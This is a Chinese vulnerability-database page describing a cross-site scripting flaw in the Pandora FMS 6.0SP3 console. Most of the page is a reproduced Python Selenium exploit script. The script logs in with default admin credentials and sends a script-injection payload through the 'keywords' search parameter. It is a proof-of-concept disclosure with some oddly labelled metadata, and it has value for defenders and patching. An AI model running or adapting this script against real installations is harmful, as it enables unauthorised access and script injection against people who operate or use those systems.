文章目录[隐藏]
Artica Pandora FMS 跨站脚本漏洞
| 漏洞ID | 2458153 | 漏洞类型 | 资源管理错误 |
| 发布时间 | 2021-05-27 | 更新时间 | 2021-06-27 |
 CVE编号 |
CVE-2021-0527 |  CNNVD-ID |
CNNVD-202105-1827 |
| 漏洞平台 | N/A | CVSS评分 | N/A |
|漏洞来源
|漏洞详情
Artica Pandora FMS是西班牙Artica公司的一套监控系统。该系统通过可视化的方式监控网络、服务器、虚拟基础架构和应用程序等。 Pandora FMS 6.0SP3版本存在资源管理错误漏洞。该漏洞源于WEB应用缺少对客户端数据的正确验证。攻击者可利用该漏洞执行客户端代码。
|漏洞EXP
# Exploit Title: XSS vulnerability for (keywords) searching parameter in
pandorafms-6.0SP3/pandora_console
# Author: @nu11secur1ty
# Testing and Debugging: @nu11secur1ty
# Date: 05.27.2021
# Vendor: https://pandorafms.com/
# Link: https://github.com/pandorafms/pandorafms/releases
# CVE: 2021-0527-nu11secur1ty
# Proof:
https://github.com/nu11secur1ty/CVE-mitre/blob/main/Pandora%20FMS%206.0%20SP3-XSS-Vulnerability/Pandora%20FMS%206.0%20SP3-XSS-Vulnerability.gif
[+] Exploit Source:
#!/usr/bin/python3
# Author: @nu11secur1ty
# CVE-2021-0527-nu11secur1ty
from selenium import webdriver
import time
import os, sys
# Vendor: https://pandorafms.com/
website_link="
http://192.168.1.160/pandorafms-6.0SP3/pandora_console/index.php"
# enter your login username
username="admin"
# enter your login password
password="pandora"
#enter the element for username input field
element_for_username="nick"
#enter the element for password input field
element_for_password="pass"
#enter the element for submit button
element_for_submit="login_button"
#browser = webdriver.Safari() #for macOS users[for others use chrome vis
chromedriver]
browser = webdriver.Chrome() #uncomment this line,for chrome users
#browser = webdriver.Firefox() #uncomment this line,for chrome users
time.sleep(3)
browser.get((website_link))
try:
username_element = browser.find_element_by_name(element_for_username)
username_element.send_keys(username)
password_element = browser.find_element_by_name(element_for_password)
password_element.send_keys(password)
signInButton = browser.find_element_by_name(element_for_submit)
signInButton.click()
# Exploit Pandora FMS 6.0 SP3-XSS-Vulnerability for (keywords) searching
parameter
time.sleep(3)
# Payload
browser.get(("
http://192.168.1.160/pandorafms-6.0SP3/pandora_console/index.php?keywords=%3Cscript%3Ealert%28%22nu11secur1ty_is_here%22%29%3B%3C%2Fscript%3E&head_search_keywords=abc"))
print("The payload is deployed, your GET parameter is vulnerable...\n")
except Exception:
#### This exception occurs if the element is not found on the webpage.
print("Sorry, but this user who you searching for is destroyed by using of
MySQL vulnerability in backend.php...")
----------------------------------------------------------------------------------------
# Exploit Title: XSS vulnerability for (keywords) searching parameter in
pandorafms-6.0SP3/pandora_console
# Date: 05.27.2021
# Exploit Authotr idea: @nu11secur1ty
# Exploit Debugging: @nu11secur1ty
# Vendor Homepage: https://pandorafms.com/
# Software Link: https://github.com/pandorafms/pandorafms/releases
# Steps to Reproduce:
https://github.com/nu11secur1ty/CVE-mitre/blob/main/Pandora%20FMS%206.0%20SP3-XSS-Vulnerability/Pandora%20FMS%206.0%20SP3-XSS-Vulnerability.gif
|参考资料
来源:cxsecurity.com
链接:https://cxsecurity.com/issue/WLB-2021050153
来源:packetstormsecurity.com
链接:https://packetstormsecurity.com/files/162833/Pandora-FMS-6.0SP3-Cross-Site-Scripting.html
本文由 华域联盟 原创撰写:华域联盟 » Artica Pandora FMS 跨站脚本漏洞
转载请保留出处和原文链接:https://www.cnhackhy.com/104059.htm
